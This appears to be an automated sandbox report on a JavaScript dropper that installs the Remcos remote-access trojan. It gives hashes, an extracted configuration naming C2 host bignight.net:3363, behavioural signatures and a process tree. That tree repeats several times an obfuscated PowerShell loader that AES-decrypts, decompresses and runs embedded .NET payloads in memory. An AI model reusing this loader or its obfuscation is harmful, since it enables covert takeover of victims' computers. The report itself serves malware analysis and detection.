Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
03-04-2024 13:43
Static task
static1
Behavioral task
behavioral1
Sample
03042024_2143_Install.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
03042024_2143_Install.js
Resource
win10v2004-20231215-en
General
-
Target
03042024_2143_Install.js
-
Size
678KB
-
MD5
550a5d0ef3c596a05e47361981c0fd17
-
SHA1
ce47883964e4ca68c30f3dfdc5b8cfde416b4dec
-
SHA256
5ede5ee989e327b0562583e3f7563d691b5c1a6ade7804d4c871df84633b5845
-
SHA512
d68416e4abc50a5d8454f17feeda5a975004180283e06455fb8bc65d4a6c7e4ad3e089747e2a460f0ed050c0c0d4ebf3ef34522190a240378ae91dcdc78513c8
-
SSDEEP
768:DkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLD:DCCCCCCCCCCCCCCCCCCK
Malware Config
Extracted
remcos
RemoteHost
bignight.net:3363
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-1XSDBO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 22 IoCs
Processes:
wscript.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 4 3992 wscript.exe 10 2824 powershell.exe 21 5052 powershell.exe 27 1724 powershell.exe 28 1888 powershell.exe 32 4980 powershell.exe 35 3780 powershell.exe 36 2104 powershell.exe 39 2928 powershell.exe 51 3096 powershell.exe 52 4880 powershell.exe 53 5036 powershell.exe 54 1888 powershell.exe 60 3908 powershell.exe 62 1944 powershell.exe 63 5012 powershell.exe 67 2452 powershell.exe 68 2804 powershell.exe 69 1276 powershell.exe 70 1088 powershell.exe 72 3600 powershell.exe 75 3600 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2824 powershell.exe 2824 powershell.exe 5052 powershell.exe 5052 powershell.exe 5100 powershell.exe 5100 powershell.exe 1724 powershell.exe 1724 powershell.exe 3636 powershell.exe 3636 powershell.exe 1112 powershell.exe 1112 powershell.exe 3632 powershell.exe 3632 powershell.exe 3632 powershell.exe 1888 powershell.exe 1888 powershell.exe 1888 powershell.exe 1572 powershell.exe 1572 powershell.exe 1572 powershell.exe 4272 powershell.exe 4272 powershell.exe 4272 powershell.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 4836 powershell.exe 4836 powershell.exe 4836 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 3780 powershell.exe 3780 powershell.exe 4064 powershell.exe 4064 powershell.exe 3780 powershell.exe 4064 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 2104 powershell.exe 2104 powershell.exe 3900 powershell.exe 3900 powershell.exe 2104 powershell.exe 3900 powershell.exe 2840 powershell.exe 2840 powershell.exe 2840 powershell.exe 2928 powershell.exe 2928 powershell.exe 4092 powershell.exe 4092 powershell.exe 2928 powershell.exe 4092 powershell.exe 2800 powershell.exe 2800 powershell.exe 2800 powershell.exe 4808 powershell.exe 4808 powershell.exe 3096 powershell.exe 3096 powershell.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 5100 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 3636 powershell.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 3632 powershell.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 4272 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 3900 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 4044 powershell.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 3908 powershell.exe Token: SeDebugPrivilege 4244 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 892 powershell.exe Token: SeDebugPrivilege 1088 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3600 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
wscript.exepowershell.execmd.execmd.exepowershell.execmd.execmd.exepowershell.exepowershell.exepowershell.execmd.execmd.exepowershell.exepowershell.execmd.execmd.exepowershell.exepowershell.execmd.exedescription pid process target process PID 3992 wrote to memory of 2824 3992 wscript.exe powershell.exe PID 3992 wrote to memory of 2824 3992 wscript.exe powershell.exe PID 2824 wrote to memory of 4864 2824 powershell.exe cmd.exe PID 2824 wrote to memory of 4864 2824 powershell.exe cmd.exe PID 4864 wrote to memory of 2004 4864 cmd.exe cmd.exe PID 4864 wrote to memory of 2004 4864 cmd.exe cmd.exe PID 2004 wrote to memory of 1984 2004 cmd.exe cmd.exe PID 2004 wrote to memory of 1984 2004 cmd.exe cmd.exe PID 2004 wrote to memory of 5100 2004 cmd.exe powershell.exe PID 2004 wrote to memory of 5100 2004 cmd.exe powershell.exe PID 2004 wrote to memory of 5100 2004 cmd.exe powershell.exe PID 3992 wrote to memory of 5052 3992 wscript.exe powershell.exe PID 3992 wrote to memory of 5052 3992 wscript.exe powershell.exe PID 5052 wrote to memory of 5024 5052 powershell.exe cmd.exe PID 5052 wrote to memory of 5024 5052 powershell.exe cmd.exe PID 5024 wrote to memory of 1344 5024 cmd.exe cmd.exe PID 5024 wrote to memory of 1344 5024 cmd.exe cmd.exe PID 3992 wrote to memory of 1724 3992 wscript.exe powershell.exe PID 3992 wrote to memory of 1724 3992 wscript.exe powershell.exe PID 1344 wrote to memory of 4836 1344 cmd.exe cmd.exe PID 1344 wrote to memory of 4836 1344 cmd.exe cmd.exe PID 1344 wrote to memory of 3636 1344 cmd.exe powershell.exe PID 1344 wrote to memory of 3636 1344 cmd.exe powershell.exe PID 1344 wrote to memory of 3636 1344 cmd.exe powershell.exe PID 5100 wrote to memory of 1112 5100 powershell.exe powershell.exe PID 5100 wrote to memory of 1112 5100 powershell.exe powershell.exe PID 5100 wrote to memory of 1112 5100 powershell.exe powershell.exe PID 3636 wrote to memory of 3632 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 3632 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 3632 3636 powershell.exe powershell.exe PID 1724 wrote to memory of 3764 1724 powershell.exe cmd.exe PID 1724 wrote to memory of 3764 1724 powershell.exe cmd.exe PID 3992 wrote to memory of 1888 3992 wscript.exe powershell.exe PID 3992 wrote to memory of 1888 3992 wscript.exe powershell.exe PID 3764 wrote to memory of 2828 3764 cmd.exe cmd.exe PID 3764 wrote to memory of 2828 3764 cmd.exe cmd.exe PID 2828 wrote to memory of 216 2828 cmd.exe cmd.exe PID 2828 wrote to memory of 216 2828 cmd.exe cmd.exe PID 2828 wrote to memory of 1572 2828 cmd.exe powershell.exe PID 2828 wrote to memory of 1572 2828 cmd.exe powershell.exe PID 2828 wrote to memory of 1572 2828 cmd.exe powershell.exe PID 1572 wrote to memory of 4272 1572 powershell.exe powershell.exe PID 1572 wrote to memory of 4272 1572 powershell.exe powershell.exe PID 1572 wrote to memory of 4272 1572 powershell.exe powershell.exe PID 1888 wrote to memory of 4864 1888 powershell.exe cmd.exe PID 1888 wrote to memory of 4864 1888 powershell.exe cmd.exe PID 4864 wrote to memory of 2292 4864 cmd.exe cmd.exe PID 4864 wrote to memory of 2292 4864 cmd.exe cmd.exe PID 3992 wrote to memory of 4980 3992 wscript.exe powershell.exe PID 3992 wrote to memory of 4980 3992 wscript.exe powershell.exe PID 2292 wrote to memory of 4040 2292 cmd.exe cmd.exe PID 2292 wrote to memory of 4040 2292 cmd.exe cmd.exe PID 2292 wrote to memory of 4836 2292 cmd.exe powershell.exe PID 2292 wrote to memory of 4836 2292 cmd.exe powershell.exe PID 2292 wrote to memory of 4836 2292 cmd.exe powershell.exe PID 4836 wrote to memory of 4400 4836 powershell.exe powershell.exe PID 4836 wrote to memory of 4400 4836 powershell.exe powershell.exe PID 4836 wrote to memory of 4400 4836 powershell.exe powershell.exe PID 4980 wrote to memory of 4716 4980 powershell.exe cmd.exe PID 4980 wrote to memory of 4716 4980 powershell.exe cmd.exe PID 4716 wrote to memory of 1464 4716 cmd.exe cmd.exe PID 4716 wrote to memory of 1464 4716 cmd.exe cmd.exe PID 3992 wrote to memory of 3780 3992 wscript.exe powershell.exe PID 3992 wrote to memory of 3780 3992 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\03042024_2143_Install.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
